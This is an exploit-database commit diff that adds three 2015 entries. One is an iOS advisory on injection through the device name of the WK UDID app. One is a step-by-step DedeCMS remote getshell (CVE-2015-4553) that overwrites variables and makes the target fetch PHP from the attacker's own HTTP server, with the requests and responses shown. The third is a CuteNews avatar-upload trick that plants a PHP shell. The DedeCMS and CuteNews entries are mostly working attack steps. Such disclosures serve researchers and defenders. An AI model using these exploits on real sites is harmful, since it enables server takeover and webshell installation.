DB: 2015-07-06

3 new exploits

files.csv

@@ -33774,6 +33774,7 @@ id,file,description,date,author,platform,type,port
 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
 37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
 37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
+37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0
 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
 37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
 37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
@@ -33820,6 +33821,7 @@ id,file,description,date,author,platform,type,port
 37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
 37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
 37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
+37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload Vulnerability",2015-07-03,T0x!c,php,webapps,80
 37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
 37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
 37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
@@ -33834,3 +33836,4 @@ id,file,description,date,author,platform,type,port
 37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
 37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
 37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
+37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0

platforms/ios/webapps/37492.txt

@@ -0,0 +1,163 @@
+Document Title:
+===============
+WK UDID v1.0.1 iOS - Command Inject Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1539
+
+
+Release Date:
+=============
+2015-07-01
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1539
+
+
+Common Vulnerability Scoring System:
+====================================
+5.6
+
+
+Product & Service Introduction:
+===============================
+This app offers the opportunity to read device-specific information from your iPhone, iPad or iPod touch. The desired information can be 
+selected and sent via email to a recipient of your choice or it can be copied to the clipboard for later use. You can get information about 
+the unique identifier (UDID), the model, the name and the operating system of your device.
+
+(Copy of the Homepage https://itunes.apple.com/us/app/wk-udid/id392624227 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered a local command inject web vulnerability in the official WK UDID v1.0.1 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-07-01:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+WK EDV GmbH
+Product: WK UDID - iOS Mobile Web Application 1.0.1
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A local command inject web vulnerability has been discovered in the official WK UDID v1.0.1 iOS mobile web-application.
+The vulnerability allows to inject malicious script codes to the application-side of the vulnerable mobile app.
+
+The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value 
+of the device to compromise the mail function of the wkudid mobile app. The html encoding is broken in the send by mail export function. 
+Local attackers are able to manipulate the device name id to compromise the application internal validation in send emails. The attack vector 
+of the vulnerability is server-side and the injection point is the device name information settings.
+
+The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. 
+Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction. 
+Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to 
+compromise the mobile iOS application and connected device components.
+
+Vulnerable Module(s)
+				[+] Device - Settings - Information
+ 
+Vulnerable Parameter(s)
+				[+] device name
+
+Affected Module(s)
+				[+] WKUDID - Mail
+
+
+Proof of Concept (PoC):
+=======================
+The local command inject web vulnerability can be exploited by local attackers with low privilege device user account and without user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce the vulnerability ...
+1. Start the iOS device
+2. Open the settings module
+3. Change the name to the local command injection payload
+4. Save the settings and start the application wkudid
+5. Send the details by mail
+6. Review the arrival inbox 
+7. The execution point is the xml and header location with the device name value
+8. Successful reproduce of the local command inject security vulnerability!
+
+
+PoC Device ID - Email
+
+<div>Identifier (UDID): FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1
+<br>Model: iPad<br>Name: bkm337>"<./[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE!]">%20<gt;<BR>
+System Name: iPhone OS<BR>System Version: 8.3<BR>Total Memory (RAM): 987.98 MB<BR>
+Free Memory: 19.06 MB<BR>Total Storage: 27.19 GB<BR>Free Storage: 0.70 GB<BR>
+CPU Frequency: an error occured<BR>Network: WiFi<BR>Wi-Fi: 02:00:00:00:00:00<BR>
+IP Address: 192.168.2.104<BR>Carrier: not available<BR></iframe></div>
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerable Device name value. Restrict the input and encode the output in the 
+vulnerable generated html file. Disallow script code values in the html generated file type to prevent further command injection attacks.
+
+
+Security Risk:
+==============
+The security rsik of the local command inject web vulnerability in the device name value is estimated as medium. (CVSS 5.6)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+

platforms/php/webapps/37423.txt

@@ -0,0 +1,199 @@
+ ==========================
+# Exploit Title: Dedecms variable coverage leads to getshell
+# Date: 26-06-2015
+# Vendor Homepage: http://www.dedecms.com/]
+# Version: dedecms 5.7-sp1 and all old version
+# CVE : CVE-2015-4553
+===========================
+
+
+[CVE-2015-4553]Dedecms variable coverage leads to getshell
+#############################################################################
+#
+#   DBAPPSECURITY  LIMITED http://www.dbappsecurity.com.cn/
+#
+#############################################################################
+#
+# CVE ID:   CVE-2015-4553
+# Subject:   Dedecms variable coverage leads to getshell
+# Author:   zise
+# Date:     06.17.2015
+#############################################################################
+Introduction:
+========
+dedecms Open source cms
+Extensive application
+ 
+Influence version 
+Newest dedecms 5.7-sp1 and all old version
+
+
+Remote getshell 
+Details:
+=======
+After the default installation of dedecms
+Installation directory
+/install/index.php
+or
+/install/index.php.bak
+ 
+/install/index.php //run iis apache exploit
+/install/index.php.bak //run apache exploit
+
+
+Code analysis
+
+/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb
+
+#############################################################################
+17 $install_demo_name = 'dedev57demo.txt';
+18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
+
+here $install_demo_name and $insLockfile definition
+// echo $install_demo_name;  printf dedev57demo.txt 
+
+29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
+30 {
+31    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
+32 }
+
+
+// echo $install_demo_name; printf aaaa
+
+$install_demo_name by variable coverage
+
+The same
+17 $install_demo_name = 'dedev57demo.txt';
+18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
+
+variable coverage
+#############################################################################
+
+
+
+ 
+GETSHELL Step 1 Clear file contents config_update.php
+#############################################################################
+config_update.php
+13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
+14 $linkHost = 'http://flink.dedecms.com/server_url.php';
+
+In order to obtain the webshell need to control $updateHost
+So the use of variable coverags cleared config_update.php
+
+ 
+http://192.168.204.135/install/index.php.bak
+?step=11
+&insLockfile=a
+&s_lang=a
+&install_demo_name=../data/admin/config_update.php
+
+index.php.bak
+373 else if($step==11)
+374 {
+375 require_once('../data/admin/config_update.php');
+376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
+377 
+378 $sql_content = file_get_contents($rmurl);
+379 $fp = fopen($install_demo_name,'w');
+380 if(fwrite($fp,$sql_content))
+381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
+382 else
+383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
+384 unset($sql_content);
+385 fclose($fp);
+386 exit();
+387 }
+
+###
+HTTP/1.1 200 OK
+Date: Wed, 17 Jun 2015 06:55:23 GMT
+Server: Apache/2.4.12
+X-Powered-By: PHP/5.6.6
+Vary: User-Agent
+Content-Length: 55
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+ 
+  <font color="red">[×]</font> 远程获取失败
+ ###
+
+
+
+
+###After execution file 0 byte ~ho~year~####
+2015/06/17  14:55                 0 config_update.php
+               1 file              0 byte
+
+
+ 
+GETSHELL Step 2
+#############################################################################
+Create local HTTP services
+ 
+zise:tmp zise$ ifconfig en0
+en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
+inet 119.253.3.18 netmask 0xffffff00 broadcast  
+ 
+zise:tmp zise$ mkdir "dedecms"
+zise:tmp zise$ cd dedecms/
+zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
+zise:dedecms zise$ cd ../
+zise:tmp zise$ python -m SimpleHTTPServer
+Serving HTTP on 0.0.0.0 port 8000 ...
+192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
+ 
+ 
+####
+http://192.168.204.135/install/index.php.bak
+?step=11
+&insLockfile=a
+&s_lang=a
+&install_demo_name=hello.php
+&updateHost=http://119.253.3.18:8000/
+
+####
+ 
+HTTP/1.1 200 OK
+Date: Wed, 17 Jun 2015 07:11:18 GMT
+Server: Apache/2.4.12
+X-Powered-By: PHP/5.6.6
+Vary: Accept-Encoding,User-Agent
+Content-Length: 81
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+ 
+  <font color="green">[√]</font> 存在(您可以选择安装进行体验)
+
+
+index.php.bak
+373 else if($step==11)
+374 {
+375 require_once('../data/admin/config_update.php');
+376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
+377 
+378 $sql_content = file_get_contents($rmurl);
+379 $fp = fopen($install_demo_name,'w');
+380 if(fwrite($fp,$sql_content))  //fwrite websehll
+381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
+382 else
+383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
+384 unset($sql_content);
+385 fclose($fp);
+386 exit();
+387 }
+ 
+Attack complete
+you webshell
+ 
+http://192.168.204.135/install/hello.php
+
+
+
+> zise ^_^
+> Security researcher
+
+This is the vulnerability of some web pages
+http://seclists.org/fulldisclosure/2015/Jun/47 

platforms/php/webapps/37474.txt

@@ -0,0 +1,48 @@
+          CuteNews 2.0.3 Remote File Upload Vulnerability
+        =================================================
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+1               ##########################################             1
+0               I'm T0x!c member from Inj3ct0r Team             1
+1               ##########################################             0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+
+
+# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
+# Date: [02/07/2015]
+# Exploit Author: [T0x!c]
+# Facebook: https://www.facebook.com/Dz.pr0s
+# Vendor Homepage: [http://cutephp.com/]
+# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
+# Version: [2.0.3] 
+# Tested on: [Windows 7]
+# greetz to :Tr00n , Kha&mix , Cc0de  , Ghosty , Ked ans , Caddy-dz .....
+==========================================================
+ # Exploit  :
+ 
+Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
+  
+ 1 - Sign up for New User
+ 2 - Log In 
+ 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
+ 4 - Select Upload Avatar Example: Evil.jpg
+ 5 - use tamper data  & Rename File Evil.jpg to Evil.php
+  
+-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
+
+6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
+
+ Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php